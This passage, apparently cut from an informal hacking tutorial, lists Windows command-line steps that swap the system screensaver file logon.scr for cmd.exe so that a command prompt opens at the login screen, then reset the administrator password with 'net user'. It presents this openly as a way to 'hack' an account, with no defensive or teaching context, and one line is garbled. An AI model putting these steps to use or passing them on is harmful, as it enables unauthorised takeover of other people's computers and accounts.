Now type
Cd\
(it changes Working Directory)
and Now Type Each Line Seprately
Cd\windows\system32
Mkdir temphack
Copy logon.scr temphack\logon.scr
Copy cmd.exe temphack\cmd.exe
Del logon.scr
Rename cmd.exe logon.scr
Exit Net user
Restart Your Pc Now When System Restarted it open CMD as Administrator Account
Now Type
Net user ###### *****
(Here ##### is ADMIN Account name and ***** is a new Hacked Password)
